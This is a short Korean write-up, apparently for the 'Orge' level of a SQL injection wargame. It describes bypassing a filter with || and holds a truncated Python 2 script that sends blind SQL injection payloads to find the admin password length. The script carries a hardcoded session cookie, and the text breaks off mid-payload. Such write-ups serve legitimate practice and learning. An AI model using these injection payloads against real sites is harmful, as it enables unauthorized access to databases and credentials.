7. Orge
서론 NULL 진행과정 Darkelf와 마찬가지로 ||를 이용해 우회한 뒤, Blind SQLi이용.1234567891011121314151617181920212223242526import httplib, urllib conn = httplib.HTTPConnection("los.eagle-jump.org")URL = "/orge_40d2b61f694f72448be9c97d1cea2480.php?pw="Headers={"Cookie":"PHPSESSID=s3kvsj2f9dq4c4ke7b0qmfaic6"}length = 0PW = "" for i in range(1, 20) : payload = "pw=%27%20||%20id=%27admin' %26%26 " + "length(pw)='"+str(i)+"..